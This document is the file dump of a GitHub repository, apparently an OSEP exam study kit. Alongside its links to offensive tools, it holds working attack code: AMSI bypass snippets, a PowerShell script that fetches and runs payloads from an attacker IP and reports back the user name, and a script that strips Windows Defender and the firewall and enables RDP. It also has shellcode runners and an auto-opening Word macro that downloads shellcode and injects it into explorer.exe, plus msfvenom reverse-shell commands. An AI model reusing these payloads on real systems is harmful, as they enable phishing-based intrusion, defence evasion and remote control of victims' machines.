Repository layout:

```text
├── .gitignore
├── images
│   ├── SliverCLM.png
│   └── UnmanagedPS.png
├── AMSI
│   ├── 2.txt
│   ├── 1.txt
│   ├── README.md
│   ├── runall.ps1
│   └── shellcoderunner.ps1
├── Tunneling
│   └── README.md
├── Active Directory
│   ├── LAPS
│   │   └── README.md
│   ├── Relay
│   │   └── README.md
│   ├── README.md
│   └── Delegation
│       └── README.md
├── Csharp Everything
│   └── README.md
├── EveryBox
│   ├── README.md
│   └── dropav.ps1
├── MSSQL
│   └── README.md
├── Seimpersonateprivilege
│   └── README.md
├── Phishing
│   ├── HTA
│   │   ├── generateHTA.py
│   │   └── README.md
│   └── Word
│       ├── README.md
│       ├── shellcode_runner.vba
│       └── msfhex_inject.vba
├── Anti-Virus
│   └── README.md
├── CLM bypass
│   └── README.md
└── README.md
```

/.gitignore:

```text
.DS_Store
```

/images/SliverCLM.png:

https://raw.githubusercontent.com/beauknowstech/OSEP-Everything/HEAD/images/SliverCLM.png

/images/UnmanagedPS.png:

https://raw.githubusercontent.com/beauknowstech/OSEP-Everything/HEAD/images/UnmanagedPS.png

/AMSI/2.txt:

```powershell
$p=$l.GetFields('NonPublic,Static');Foreach($v in $p) {if ($v.Name -like "*Failed") {$z=$v}};$z.SetValue($null,$true)
```

/AMSI/1.txt:

```powershell
$o=[Ref].Assembly.GetTypes();Foreach($x in $o) {if ($x.Name -like "*iUtils") {$l=$x}};$p=$l.GetFields('NonPublic,Static')
```
/Tunneling/README.md:

# Tunneling
proxychains is slow and dies easily. Use [ligolo-ng](https://github.com/nicocha30/ligolo-ng) instead. There are many tutorials online, but I like this one:
https://www.stationx.net/how-to-use-ligolo-ng/

/Active Directory/LAPS/README.md:

# LAPS

https://github.com/leoloobeek/LAPSToolkit/

https://github.com/swisskyrepo/SharpLAPS

Metasploit:
`use post/windows/gather/credentials/enum_laps`

NetExec:
The NetExec LDAP protocol has a LAPS module. Use `-M laps`.

/Csharp Everything/README.md:

# CSHARP collections

https://github.com/Flangvik/SharpCollection/

https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

https://github.com/boh/RedCsharp

https://github.com/S3cur3Th1sSh1t/PowerSharpPack

Yes, I'm counting PowerSharpPack even though it's PowerShell.

https://github.com/Aetsu/OffensivePipeline/tree/main

/Active Directory/Relay/README.md:

# Relay resources

`impacket-ntlmrelayx`

https://github.com/p0dalirius/Coercer

https://gritters.medium.com/responder-and-ntlmrelay-cbaf4bb71df3

[MSSqlPwner](/MSSQL/README.md) has an NTLM relay function that can be used with ntlmrelayx.

Check the different `-relay-method` options:

https://github.com/ScorpionesLabs/MSSqlPwner?tab=readme-ov-file#functionalities
/EveryBox/README.md:

# Everybox
Stuff I ran on every box.

## dropav.ps1
My own version of https://github.com/emanuelepicas/OSEP/blob/master/AV-Evasion/DisableSecuritySettings/dropAV_AND_More.ps1
Rolls back AV definitions, disables AV functions, disables the firewall, and allows RDP and PTH for RDP.

### Host with gup
https://github.com/beauknowstech/gup
Or `python3 -m http.server`, but I like gup better. Obviously. I made it to be better.

/MSSQL/README.md:

# MSSQL

https://github.com/ScorpionesLabs/MSSqlPwner

MSSqlPwner is amazing. Be familiar with all the functionalities listed on the GitHub page, as well as the authentication methods.

https://github.com/skahwah/SQLRecon

I think sqlrecon is built into sliver as well.

https://github.com/NetSPI/PowerUpSQL

https://github.com/fortra/impacket/blob/master/examples/mssqlclient.py

Learning:

https://mayfly277.github.io/posts/GOADv2-pwning-part7/

/Seimpersonateprivilege/README.md:

# Seimpersonateprivilege
Windows privesc to SYSTEM.

## meterpreter
If you have a meterpreter shell, just use

`getsystem -t 5` or `getsystem -t 6`

which are https://github.com/itm4n/PrintSpoofer and https://github.com/zcgonvh/EfsPotato respectively.

https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/windows/escalate/getsystem.md

## Others

If not using a meterpreter shell, then use https://github.com/BeichenDream/GodPotato or its variant https://github.com/lypd0/DeadPotato

/AMSI/README.md:

# AMSI bypass
## Beau's lil two step

To bypass AMSI I would run runall.ps1, which runs 1.txt and 2.txt and then a .ps1 of your choice, in this case
https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Simple%20Shellcode%20Runner/Simple%20Shellcode%20Runner.ps1, which I renamed to shellcoderunner.ps1.
It has its own AMSI bypass, but my "lil two step", as I call it, works on current versions of Windows, at least as of the time of writing.

### Host with gup
https://github.com/beauknowstech/gup
Or `python3 -m http.server`, but I like gup better. Obviously. I made it to be better.
/AMSI/runall.ps1:

```powershell
#powershell -c IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/runall.ps1')

$ip = '192.168.x.x'

#amsi bypass
iex (New-Object Net.WebClient).DownloadString("http://$ip/1.txt")
iex (New-Object Net.WebClient).DownloadString("http://$ip/2.txt")
# report process bitness and current user back to the hosting server via the request path
$is64ps = [Environment]::Is64BitProcess
iex (New-Object Net.WebClient).DownloadString("http://$ip/is64ps=$is64ps")
$user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
iex (New-Object Net.WebClient).DownloadString("http://$ip/username=$user")
#iex (New-Object Net.WebClient).DownloadString("http://$ip/basicrunner.ps1")
#Usually works best:
iex (New-Object Net.WebClient).DownloadString("http://$ip/shellcoderunner.ps1")
```

/Phishing/HTA/generateHTA.py:

```python
import argparse
# from emvee_nl on discord
def generate_hta(js_file, out_file):
    with open(js_file, 'r') as f:
        js_data = f.read()

    template = '''

    '''

    with open(out_file, 'w') as f:
        f.write(template.format(js_data))

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--in', dest='js_file', required=True, help='Input JS file')
    parser.add_argument('--out', dest='out_file', required=True, help='Output HTA file')
    args = parser.parse_args()

    generate_hta(args.js_file, args.out_file)
```

/Anti-Virus/README.md:

# Anti-Virus stuff

### Resources
https://book.ghanim.no/?p=2698#test-payload-against-av

https://offensivedefence.co.uk/posts/threatcheck-ghidra/

https://medium.com/@luisgerardomoret_69654/obfuscating-a-mimikatz-downloader-to-evade-defender-2024-b3a9098f0ae7

### The ones I use regularly
https://github.com/TheWover/donut

https://github.com/Tylous/ScareCrow

https://github.com/XenocodeRCE/neo-ConfuserEx

https://www.youtube.com/watch?v=y_ma9cLFdmY

https://github.com/rasta-mouse/ThreatCheck

### The ones I haven't used

https://github.com/almounah/superdeye

https://github.com/JoelGMSec/Invoke-Stealth

https://github.com/mgeeky/ProtectMyTooling

https://github.com/tokyoneon/Chimera

https://github.com/Aetsu/OffensivePipeline/

https://github.com/h4wkst3r/InvisibilityCloak

https://github.com/okankurtuluss/ShadowInjector/

https://github.com/hasherezade/exe_to_dll

https://github.com/govolution/avet

https://github.com/iilegacyyii/Shellcrypt

https://github.com/nickvourd/Supernova?tab=readme-ov-file#features

/Active Directory/README.md:

# Active Directory
AD is a key component of OSEP. These are some of my favorite tools.

## General AD and cheat sheets
https://github.com/infosecn1nja/AD-Attack-Defense

https://gatari.dev/posts/the-art-of-exploiting-ad-from-linux/#windows---linux-interoperability

### adPEAS

https://github.com/61106960/adPEAS/blob/main/adPEAS-Light.ps1

adPEAS does some quick checks similar to linpeas/winpeas.
The light version does not run a BloodHound collection.

### Impacket

https://www.kali.org/tools/impacket-scripts/

Impacket has a LOT of scripts that you will find useful.

### Netexec

https://www.netexec.wiki/

https://github.com/Pennyw0rth/NetExec

### GOAD

Game of Active Directory: a purposely vulnerable Active Directory that can be used for practice.

https://github.com/Orange-Cyberdefense/GOAD

https://github.com/lkarlslund/deploy-goad

I personally did not use this, but many have found it useful.

### Bloodhound

By now you should know about this.

https://github.com/SpecterOps/BloodHound

### Others
https://wadcoms.github.io/

https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/

/CLM bypass/README.md:

# CLM bypass
Both Sliver and Meterpreter have built-in CLM bypass modules.

### Sliver:

`sharpsh -- -c $ExecutionContext.SessionState.LanguageMode`
![SliverCLM](../images/SliverCLM.png?raw=true "Sliver CLM bypass")

### Meterpreter:
```powershell
meterpreter > load powershell
meterpreter > powershell_execute $ExecutionContext.SessionState.LanguageMode
[+] Command execution completed:
FullLanguage
```

### UnmanagedPowerShell
https://github.com/mmnoureldin/UnmanagedPowerShell

`load powershell` may not work if AV is still on. UnmanagedPowerShell should work, AND it has built-in PowerView, PowerUp, PowerUpSQL, and Powermad.

Use donut as shown in the video from the repo to generate the shellcode.

`./donut -i /tmp/UnmanagedPowerShell.exe -o /home/kali/tools/Windows/UnmanagedPS.bin`

In meterpreter:
```
bg
use post/windows/manage/shellcode_inject

set CHANNELIZED true
set INTERACTIVE true
set session X
set shellcode /home/kali/tools/Windows/UnmanagedPS.bin

run
```
![Unmanaged Powershell](../images/UnmanagedPS.png?raw=true "Unmanaged Powershell")

### Other projects to check out

https://github.com/beauknowstech/FullBypass

https://github.com/calebstewart/bypass-clm

https://github.com/n3rada/powerspace

https://github.com/padovah4ck/PSByPassCLM

/Active Directory/Delegation/README.md:

# Delegation

Delegation is one of the subjects that I like to know how to exploit using both Linux and Windows.

Linux:

`impacket-rbcd`

Windows:

https://github.com/GhostPack/Rubeus

## Unconstrained

https://www.guidepointsecurity.com/blog/delegating-like-a-boss-abusing-kerberos-delegation-in-active-directory/

Bloodhound:

`MATCH (c:Computer {unconstraineddelegation:true}) RETURN c`

Netexec ldap has `--trusted-for-delegation`.

adPEAS will also check for unconstrained delegation.
https://www.thehacker.recipes/ad/movement/kerberos/delegations/unconstrained

## RBCD

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/constrained-delegation

Meterpreter:

`auxiliary/admin/ldap/rbcd`

In PowerView do
`Get-DomainComputer -TrustedToAuth`

`Get-NetComputer -TrustedToAuth | select samaccountname,msds-allowedtodelegateto | ft`

Same with user.

Look at the cn value (name of the computer) and the msds-allowedtodelegateto value.

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution

https://luemmelsec.github.io/S4fuckMe2selfAndUAndU2proxy-A-low-dive-into-Kerberos-delegations/

https://mayfly277.github.io/posts/GOADv2-pwning-part10/

https://www.youtube.com/watch?v=DVw9g7w4qu8&t=296s

/Phishing/Word/README.md:

# Word macros
### Process hollowing
Process hollowing that also works on 32-bit:
https://gist.github.com/Mayfly277/6edbcf3be63921b5071183e1cfdb3ea8

Your payload size will be shown in the output of your msfvenom command. Make sure to put that in on line 162.

Original 64-bit version:
https://github.com/ColeHouston/word-vba-process-hollowing/blob/main/macro.vb

### msfhex_inject.vba
32-bit only.
Hosts the shellcode externally to bypass AV.

`msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xx.xxx LPORT=4444 EXITFUNC=thread -f hex > shellcode.txt`

Host with https://github.com/beauknowstech/gup or `python3 -m http.server`.

Make sure to change the IP on line 87.

### shellcode_runner.vba
Converted https://arttoolkit.github.io/wadcoms/ShellcodeRunner-VBA/ to 32-bit.

## Other resources:

https://github.com/S3cur3Th1sSh1t/OffensiveVBA/tree/main/src

https://github.com/hackinaggie/OSEP-Tools-v2/tree/main/Macros

https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/

https://www.depthsecurity.com/blog/obfuscating-malicious-macro-enabled-word-docs/

https://www.youtube.com/watch?v=KeSRGjnTdSc

https://secureyourit.co.uk/wp/2019/05/10/dynamic-microsoft-office-365-amsi-in-memory-bypass-using-vba/

https://medium.com/@luisgerardomoret_69654/obfuscating-office-macros-to-evade-defender-468606f5790c

https://github.com/Inf0secRabbit/BadAssMacros

https://github.com/JohnWoodman/VBA-Macro-Reverse-Shell/blob/main/VBA-Reverse-Shell.vba

/README.md:

# OSEP-Everything
Everything from my OSEP study.

Not fully complete, still adding stuff as I go.

I would advise going through the OSEP study material and learning how to do things the way they teach in the course. Then use some of these tools to learn how to do it faster.

## [Active Directory](/Active%20Directory/)
Tools for AD enumeration and exploitation
### [Delegation](/Active%20Directory/Delegation/)
Unconstrained, Constrained, Resource Based Constrained.
### [LAPS](/Active%20Directory/LAPS/)
LAPS stuff

### [Relay](/Active%20Directory/Relay/)
Relay stuff

## [AMSI](/AMSI/)
Contains my AMSI bypass

## [Anti-Virus](/Anti-Virus/)
Tools for AV

## [CLM bypass](/CLM%20bypass/)
Sliver and Meterpreter have built-in bypasses, including one more for when Defender is still on, and then a backup.

## [CSharp Everything](/Csharp%20Everything/)
Collections of CSharp stuff

## [EveryBox](/EveryBox/)
These are things I run on every box.

## [MSSQL](/MSSQL/)
MSSQL stuff

## [Phishing](/Phishing/)
[HTA](/Phishing/HTA/) and [Word](/Phishing/Word/) for phishing purposes.

### [HTA](/Phishing/HTA/)
2 that worked for me.

### [Word](/Phishing/Word/)
3 32-bit and one 64-bit VBA macros that bypass current AV.

## [Tunneling](/Tunneling/)
Use https://github.com/nicocha30/ligolo-ng

## Other OSEP github resources in no particular order

https://github.com/In3x0rabl3/OSEP/blob/main/osep_reference.md

https://github.com/hackinaggie/OSEP-Tools-v2

https://github.com/timip/OSEP

https://github.com/chvancooten/OSEP-Code-Snippets

https://github.com/In3x0rabl3/OSEP

https://github.com/0xVavaldi/OSEP-CyberChef-Recipes

/Phishing/HTA/README.md:

# HTA
### SuperSharpShooter
https://github.com/SYANiDE-/SuperSharpShooter
The original sharpshooter no longer works.

`msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.xxx LPORT=443 -e x64/xor_dynamic -b '\\x00\\x0a\\x0d' -f raw > rawsc.bin`

NOTE: As of now supersharpshooter doesn't work with the --payload of hta. You have to do payload js and then put it in an hta with the script provided.

`./SuperSharpShooter.py --stageless --dotnetver 4 --rawscfile ~/OSEP/rawsc.bin --payload js --output test`

Generate HTA python script from [@emvee_nl](https://github.com/emvee-nl):

generateHTA.py

`python3 generateHTA.py --in test.js --out test.hta`

OR just paste the js into the .hta code manually.

## Certutil
I first saw this method on this youtube video:
https://www.youtube.com/watch?v=63eE_DYrmvc

https://github.com/chvancooten/OSEP-Code-Snippets/tree/main/AppLocker%20Bypass%20PowerShell%20Runspace

Compile this but with the correct IP and powershell stuff. Use certutil to encode it:
`certutil.exe -encode .\AppLocker.exe enc.txt`

Put enc.txt in the same folder as your ps1 payload.
Then make a cert.hta file with these contents:
(And obviously change the IP address.)

/EveryBox/dropav.ps1:

```powershell
# (New-Object System.Net.WebClient).DownloadString("http://192.168.XXX.XXX/dropAV.ps1") | IEX
# irm http://192.168.x.x/dropav.ps1 | IEX
# Slightly modified from https://github.com/emanuelepicas/OSEP/blob/master/AV-Evasion/DisableSecuritySettings/dropAV_AND_More.ps1

# Roll back definitions
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all

# Disable Windows Defender Real-Time Monitoring
Set-MpPreference -DisableRealtimeMonitoring $true

# Disable various Windows Defender protection features
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisablePrivacyMode $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
Set-MpPreference -DisableScriptScanning $true

# Disable Cloud-delivered Protection
Set-MpPreference -MAPSReporting Disabled

# Disable Automatic Sample Submission
Set-MpPreference -SubmitSamplesConsent NeverSend

# Disable automatic exclusions
Set-MpPreference -DisableAutoExclusions $true

# Turn off potentially unwanted application (PUA) protection
Set-MpPreference -PUAProtection 0

# Allow Restricted Admin mode (PTH for RDP)
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0
#may have to run manually in cmd:
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

# Allow RDP connections
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# Disable Windows Firewall for all profiles
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

# Optionally disable Windows Defender completely (very cautious use recommended)
# Disable-WindowsOptionalFeature -Online -FeatureName Windows-Defender-Features

# Function to check the status of Windows Defender settings
function Check-DefenderStatus {
    Get-MpPreference
}

# Call the function to output the current status of Defender settings
Check-DefenderStatus

# Reminder message
Write-Host "All security settings have been disabled. Ensure to re-enable after testing." -ForegroundColor Red
```

/Phishing/Word/shellcode_runner.vba:

```vba
' 32-bit version of https://arttoolkit.github.io/wadcoms/ShellcodeRunner-VBA/
' Converted to 32-bit by https://github.com/beauknowstech
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal lDestination As Long, ByRef sSource As Any, ByVal lLength As Long) As Long
Private Declare Function CreateThread Lib "kernel32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As Long, ThreadParameter As Long, ByVal CreateFlags As Long, ByRef ThreadId As Long) As Long
Private Declare Function Sleep Lib "kernel32" (ByVal mili As Long) As Long
Private Declare Function FlsAlloc Lib "kernel32" (ByVal lpCallback As Long) As Long

Sub Document_Open()
    ShellcodeRunner
End Sub

Sub AutoOpen()
    ShellcodeRunner
End Sub

Function ShellcodeRunner()
    Dim buf As Variant
    Dim tmp As Long
    Dim addr As Long
    Dim counter As Long
    Dim data As Long
    Dim res As Long
    Dim dream As Integer
    Dim before As Date
    Dim t As Date

    ' Check if we're in a sandbox by calling a rarely emulated API
    If IsNull(FlsAlloc(tmp)) Then
        Exit Function
    End If

    ' Sleep to evade in-memory scan + check if the emulator did not fast-forward through the sleep instruction
    dream = Int((1500 * Rnd) + 2000)
    before = Now()
    Sleep (dream)
    If DateDiff("s", t, Now()) < dream Then
        Exit Function
    End If

    ' msfvenom -p windows/meterpreter/reverse_https LHOST=172.16.240.178 LPORT=443 EXITFUNC=thread -f vbapplication --encrypt xor --encrypt-key a
    buf = Array(157, 137, 238, 97, 97, 97, 1, 80, ...)

    ' XOR-decrypt the shellcode
    For i = 0 To UBound(buf)
        buf(i) = buf(i) Xor Asc("a")
    Next i

    ' &H3000 = MEM_COMMIT | MEM_RESERVE
    ' &H40 = PAGE_EXECUTE_READWRITE
    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)

    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter

    res = CreateThread(0, 0, addr, 0, 0, 0)
End Function
```

/AMSI/shellcoderunner.ps1:

```powershell
#https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Simple%20Shellcode%20Runner/Simple%20Shellcode%20Runner.ps1

# Compact AMSI bypass
[Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)

# Shellcode loader >:]
function LookupFunc {
    Param ($moduleName, $functionName)
    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
        Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $tmp=@()
    $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
        @($moduleName)), $functionName))
}

function getDelegateType {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
        [Parameter(Position = 1)] [Type] $delType = [Void]
    )
    $type = [AppDomain]::CurrentDomain.
        DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
        [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
        DefineDynamicModule('InMemoryModule', $false).
        DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
        [System.MulticastDelegate])
    $type.
        DefineConstructor('RTSpecialName, HideBySig, Public',
        [System.Reflection.CallingConventions]::Standard, $func).
        SetImplementationFlags('Runtime, Managed')
    $type.
        DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
        SetImplementationFlags('Runtime, Managed')
    return $type.CreateType()
}

# Allocate executable memory
$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),
    (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)

# Copy shellcode to allocated memory
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.67 LPORT=443 EXITFUNC=thread -f powershell
# I got it to work better with windows/x64/meterpreter/reverse_https
# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=tun0 LPORT=443 EXITFUNC=thread -f powershell
[Byte[]] $buf = @()  # the msfvenom byte array that was here has been omitted from this copy
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)

# Execute shellcode and wait for it to exit
$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),
    (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject),
    (getDelegateType @([IntPtr], [Int32])([Int]))).Invoke($hThread, 0xFFFFFFFF)
```

/Phishing/Word/msfhex_inject.vba:

Line numbers are kept here because the file's own comments (and the Word README) refer to line 87.

```vba
 1 | ' For 32bit installs of office
 2 | ' Generate hex shellcode with
 3 | ' msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=4444 EXITFUNC=thread -f hex > shellcode.txt
 4 | ' Host with https://github.com/beauknowstech/gup
 5 | ' Or python3 -m http.server
 6 | ' Don't forget to change the URL on line 87
 7 | ' You can also change the process it injects into on line 99 if you know for sure a different 32-bit process will be running
 8 |
 9 |
10 | Private Declare PtrSafe Function OpenProcess Lib "kernel32" ( _
11 |     ByVal dwDesiredAccess As Long, _
12 |     ByVal bInheritHandle As Long, _
13 |     ByVal dwProcessId As Long) As LongPtr
14 |
15 | Private Declare PtrSafe Function VirtualAllocEx Lib "kernel32" ( _
16 |     ByVal hProcess As LongPtr, _
17 |     ByVal lpAddress As LongPtr, _
18 |     ByVal dwSize As LongPtr, _
19 |     ByVal flAllocationType As Long, _
20 |     ByVal flProtect As Long) As LongPtr
21 |
22 | Private Declare PtrSafe Function WriteProcessMemory Lib "kernel32" ( _
23 |     ByVal hProcess As LongPtr, _
24 |     ByVal lpBaseAddress As LongPtr, _
25 |     ByRef lpBuffer As Any, _
26 |     ByVal nSize As LongPtr, _
27 |     ByRef lpNumberOfBytesWritten As LongPtr) As Long
28 |
29 | Private Declare PtrSafe Function CreateRemoteThread Lib "kernel32" ( _
30 |     ByVal hProcess As LongPtr, _
31 |     ByVal lpThreadAttributes As LongPtr, _
32 |     ByVal dwStackSize As LongPtr, _
33 |     ByVal lpStartAddress As LongPtr, _
34 |     ByVal lpParameter As LongPtr, _
35 |     ByVal dwCreationFlags As Long, _
36 |     ByRef lpThreadId As LongPtr) As LongPtr
37 |
38 | Private Declare PtrSafe Function CloseHandle Lib "kernel32" ( _
39 |     ByVal hObject As LongPtr) As Long
40 |
41 | Private Declare PtrSafe Function CreateToolhelp32Snapshot Lib "kernel32" ( _
42 |     ByVal dwFlags As Long, _
43 |     ByVal th32ProcessID As Long) As LongPtr
44 |
45 | Private Declare PtrSafe Function Process32First Lib "kernel32" ( _
46 |     ByVal hSnapshot As LongPtr, _
47 |     ByRef lppe As PROCESSENTRY32) As Long
48 |
49 | Private Declare PtrSafe Function Process32Next Lib "kernel32" ( _
50 |     ByVal hSnapshot As LongPtr, _
51 |     ByRef lppe As PROCESSENTRY32) As Long
52 |
53 | Private Declare PtrSafe Function lstrlenW Lib "kernel32" ( _
54 |     ByVal lpString As LongPtr) As Long
55 |
56 | Private Type PROCESSENTRY32
57 |     dwSize As Long
58 |     cntUsage As Long
59 |     th32ProcessID As Long
60 |     th32DefaultHeapID As LongPtr
61 |     th32ModuleID As Long
62 |     cntThreads As Long
63 |     th32ParentProcessID As Long
64 |     pcPriClassBase As Long
65 |     dwFlags As Long
66 |     szExeFile As String * 260
67 | End Type
68 |
69 | Private Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
70 | Private Const MEM_COMMIT As Long = &H1000
71 | Private Const MEM_RESERVE As Long = &H2000
72 | Private Const PAGE_EXECUTE_READWRITE As Long = &H40
73 | Private Const TH32CS_SNAPPROCESS As Long = &H2
74 |
75 | Sub AutoOpen()
76 |     ' This macro runs when the document is opened
77 |
78 |     Dim http As Object
79 |     Dim shellcode As String
80 |     Dim shellcodeBytes() As Byte
81 |     Dim targetProcessId As Long
82 |     Dim hProcess As LongPtr
83 |     Dim memAddr As LongPtr
84 |
85 |     ' URL of the shellcode (as a hex string)
86 |     Dim url As String
87 |     url = "http://192.168.52.130/shellcode.txt" ' Replace with your IP
88 |
89 |     ' Download the shellcode using MSXML2.XMLHTTP
90 |     Set http = CreateObject("MSXML2.XMLHTTP")
91 |     http.Open "GET", url, False
92 |     http.Send
93 |     shellcode = http.responseText
94 |
95 |     ' Convert the hex shellcode to a byte array
96 |     shellcodeBytes = HexStringToByteArray(shellcode)
```
97 | 98 | ' Find the target process by name (e.g., explorer.exe) 99 | targetProcessId = FindProcessIdByName("explorer.exe") ' You can change this to notepad.exe for testing 100 | 101 | If targetProcessId = 0 Then 102 | MsgBox "Target process not found!" 103 | Exit Sub 104 | End If 105 | 106 | ' Open the target process with all access 107 | hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, targetProcessId) 108 | 109 | If hProcess = 0 Then 110 | MsgBox "Failed to open target process!" 111 | Exit Sub 112 | End If 113 | 114 | ' Allocate memory in the target process 115 | memAddr = VirtualAllocEx(hProcess, 0, UBound(shellcodeBytes) - LBound(shellcodeBytes) + 1, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE) 116 | 117 | If memAddr = 0 Then 118 | MsgBox "Memory allocation in target process failed!" 119 | CloseHandle (hProcess) 120 | Exit Sub 121 | End If 122 | 123 | ' Write the shellcode to the target process 124 | Dim bytesWritten As LongPtr 125 | WriteProcessMemory hProcess, memAddr, shellcodeBytes(LBound(shellcodeBytes)), UBound(shellcodeBytes) - LBound(shellcodeBytes) + 1, bytesWritten 126 | 127 | If bytesWritten = 0 Then 128 | MsgBox "Failed to write shellcode to the target process!" 129 | CloseHandle (hProcess) 130 | Exit Sub 131 | End If 132 | 133 | ' Create a remote thread in the target process to execute the shellcode 134 | Dim hThread As LongPtr 135 | hThread = CreateRemoteThread(hProcess, 0, 0, memAddr, 0, 0, 0) 136 | 137 | If hThread = 0 Then 138 | MsgBox "Failed to create remote thread!" 139 | CloseHandle (hProcess) 140 | Exit Sub 141 | End If 142 | 143 | ' Close the handles 144 | CloseHandle (hThread) 145 | CloseHandle (hProcess) 146 | 147 | MsgBox "Shellcode injected and executed in target process." 
148 | End Sub 149 | 150 | Function FindProcessIdByName(processName As String) As Long 151 | ' Finds the process ID of a process by its executable name 152 | Dim hSnapshot As LongPtr 153 | Dim pe32 As PROCESSENTRY32 154 | Dim processId As Long 155 | 156 | hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) 157 | If hSnapshot = 0 Then 158 | FindProcessIdByName = 0 159 | Exit Function 160 | End If 161 | 162 | pe32.dwSize = Len(pe32) 163 | If Process32First(hSnapshot, pe32) = 0 Then 164 | CloseHandle hSnapshot 165 | FindProcessIdByName = 0 166 | Exit Function 167 | End If 168 | 169 | Do 170 | ' Check if this is the process we're looking for 171 | If InStr(1, pe32.szExeFile, processName, vbTextCompare) > 0 Then 172 | processId = pe32.th32ProcessID 173 | Exit Do 174 | End If 175 | Loop While Process32Next(hSnapshot, pe32) 176 | 177 | CloseHandle hSnapshot 178 | FindProcessIdByName = processId 179 | End Function 180 | 181 | Function HexStringToByteArray(hexString As String) As Byte() 182 | ' Converts a hex-encoded string to a byte array 183 | Dim bytes() As Byte 184 | Dim i As Long 185 | Dim length As Long 186 | 187 | length = Len(hexString) \ 2 188 | ReDim bytes(length - 1) 189 | 190 | For i = 0 To length - 1 191 | bytes(i) = CByte("&H" & Mid(hexString, i * 2 + 1, 2)) 192 | Next i 193 | 194 | HexStringToByteArray = bytes 195 | End Function --------------------------------------------------------------------------------
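The macro above decodes whatever the web server returns with fixed two-character pairs and no validation, so the hosted shellcode.txt has to be exactly what `msfvenom -f hex` wrote. The following Python is an added operator-side check, not part of this repo or of msfvenom: it re-implements the macro's HexStringToByteArray() decoding rules so a payload file can be verified before it is hosted. The sample bytes are a constructed stand-in for real shellcode, the function names are mine, and it assumes `-f hex` output is plain lowercase hex with no separators.

```python
"""Operator-side check for the hex payload file that msfhex_inject.vba fetches.

Added example for this page, not part of the original macro or of msfvenom.
It mirrors the macro's HexStringToByteArray() decoding so the file produced by
`msfvenom ... -f hex > shellcode.txt` can be verified before it is hosted.
"""
import re

# Constructed sample bytes (xor eax,eax / nop / ret), a stand-in for msfvenom output
SAMPLE_SHELLCODE = bytes.fromhex("31c090c3")

HEX_PAIR = re.compile(r"[0-9A-Fa-f]{2}")


def to_hex_file(shellcode: bytes) -> str:
    """Encode raw shellcode the way `msfvenom -f hex` writes it (assumed here):
    lowercase hex digits, no separators, no trailing newline."""
    return shellcode.hex()


def decode_like_macro(text: str) -> bytes:
    """Decode exactly as the VBA HexStringToByteArray() does.

    The macro computes Len(hexString) \\ 2 and walks fixed two-character pairs
    from the start, so one trailing stray character (e.g. a lone LF) is silently
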